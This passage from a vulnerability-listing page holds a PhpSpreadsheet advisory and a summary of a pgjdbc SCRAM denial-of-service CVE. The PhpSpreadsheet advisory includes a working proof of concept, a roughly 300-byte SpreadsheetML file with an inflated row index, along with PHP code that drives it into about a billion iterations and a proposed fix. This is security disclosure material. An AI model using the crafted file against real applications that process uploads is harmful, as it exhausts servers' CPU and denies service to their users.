still uses the inflated `$rowID` at line 412, so the `ss:Hidden` attribute is not required to trigger the vulnerability. 1. Create `poc.xml`: ```xml <?xml version="1.0"?> <?mso-application progid="Excel.Sheet"?> <Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet" xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"> <Worksheet ss:Name="Sheet1"> <Table> <Row ss:Index="999999999" ss:Hidden="1"/> <Row><Cell><Data ss:Type="String">test</Data></Cell></Row> </Table> </Worksheet> </Workbook> ``` 2. Load and iterate: ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; $reader = IOFactory::createReader('Xml'); $spreadsheet = $reader->load('poc.xml'); $sheet = $spreadsheet->getActiveSheet(); echo "Highest row: " . $sheet->getHighestRow() . "\n"; // Outputs: Highest row: 1000000000 // This loop will attempt ~1 billion iterations → CPU exhaustion foreach ($sheet->getRowIterator() as $row) { // Never completes } ``` Any PHP application that processes user-uploaded SpreadsheetML XML files using PhpSpreadsheet is vulnerable. An attacker can cause denial of service by: - Exhausting server CPU with a single small XML file (~300 bytes) - Blocking the PHP worker process, potentially affecting all concurrent users - Triggering PHP max_execution_time limits that still consume resources before killing the process The attack requires no authentication - only the ability to upload or cause the application to process a crafted SpreadsheetML file. Add MAX_ROW validation after reading the `ss:Index` attribute in `src/PhpSpreadsheet/Reader/Xml.php`: ```php // After line 398: if (isset($row_ss['Index'])) { $rowID = (int) $row_ss['Index']; if ($rowID > AddressRange::MAX_ROW) { $rowID = AddressRange::MAX_ROW; } } ``` Add the necessary import at the top of the file: ```php use PhpOffice\PhpSpreadsheet\Cell\AddressRange; ``` The same validation should also be applied to the `ss:Index` attribute on `<Cell>` elements (line 409) for the column dimension.

PHP Microsoft Denial Of Service
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-42198 HIGH PATCH GHSA This Week

pgjdbc is an open source postgresql JDBC Driver. From version 42.2.0 to before version 42.7.11, pgjdbc is vulnerable to a client-side denial of service during SCRAM-SHA-256 authentication. A malicious server can instruct the driver to perform SCRAM authentication with a very large iteration count. With a large enough value, the client spends an unbounded amount of CPU time inside PBKDF2 before authentication can fail. A single attempt ties up a CPU core. Repeated or concurrent attempts exhaust client CPU and can wedge connection pools. In affected versions, loginTimeout did not fully mitigate this problem. When loginTimeout expired, the caller could stop waiting, but the worker thread performing the connection attempt could continue running and burning CPU inside the SCRAM PBKDF2 computation. This issue has been patched in version 42.7.11.

PostgreSQL Denial Of Service Postgresql Jdbc Driver
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.0%
Page 1 of 2 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy